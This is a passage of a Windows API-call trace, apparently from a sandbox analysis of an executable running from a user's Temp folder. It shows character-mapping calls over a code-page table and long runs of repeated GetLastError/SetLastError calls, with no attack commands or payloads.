lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0113.121] GetLastError () returned 0x6 [0113.121] SetLastError (dwErrCode=0x6) [0113.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뿽獪ശAĀ") returned 256 [0113.121] LCMapStringW 
(in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뿽獪ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0113.121] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뿽獪ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0113.121] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x62\x83\x0f\x75\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0113.121] GetLastError () returned 0x6 [0113.121] SetLastError (dwErrCode=0x6) [0113.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뿽獪ശAĀ") returned 256 [0113.122] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뿽獪ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0113.122] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뿽獪ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0113.122] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x0
5\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf
9\xfa\xfb\xfc\xfd\xfe\xff\x62\x83\x0f\x75\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0113.122] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.122] SetLastError (dwErrCode=0x0) [0113.122] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError 
(dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.123] GetLastError () returned 0x0 [0113.123] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.124] GetLastError () returned 0x0 [0113.124] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError 
(dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.125] SetLastError (dwErrCode=0x0) [0113.125] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.126] SetLastError (dwErrCode=0x0) [0113.126] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError 
(dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.127] GetLastError () returned 0x0 [0113.127] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError 
(dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.128] SetLastError (dwErrCode=0x0) [0113.128] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.129] SetLastError (dwErrCode=0x0) [0113.129] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 0x0 [0113.130] SetLastError (dwErrCode=0x0) [0113.130] GetLastError () returned 